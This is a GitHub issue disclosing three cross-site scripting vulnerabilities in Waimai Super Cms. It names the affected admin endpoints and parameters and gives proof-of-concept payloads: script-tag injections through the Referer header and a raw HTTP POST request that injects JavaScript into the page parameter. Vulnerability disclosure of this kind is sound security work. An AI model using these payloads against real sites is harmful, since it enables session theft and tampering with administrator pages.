Skip to content

Three XSS vulnerabilities found in Waimai Super Cms #16

@Binarytree200

Description

@Binarytree200

In waimai Super Cms master, there is an XSS vulnerability via the /admin.php?m=Config&a=add and /admin.php/Link/addsave Referer parameter, /?delURL=1&url=x&page= page parameter

#1
Payload: Referer: '"><script>alert(123)</script>

image

image

image

#2
Payload: Referer: '"><script>alert(456)</script>

image

image

image

#3
Payload:
POST /?delURL=1&url=x&page=%22;alert(xssone);%20var%20d=%22 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://localhost/admin.php?&m=Public&a=login
Cookie: PHPSESSID=bld8qdt5dvpos2iv44l50g7196
Connection: keep-alive
Host: localhost
Content-Length: 0
Accept: /
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded

image

image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions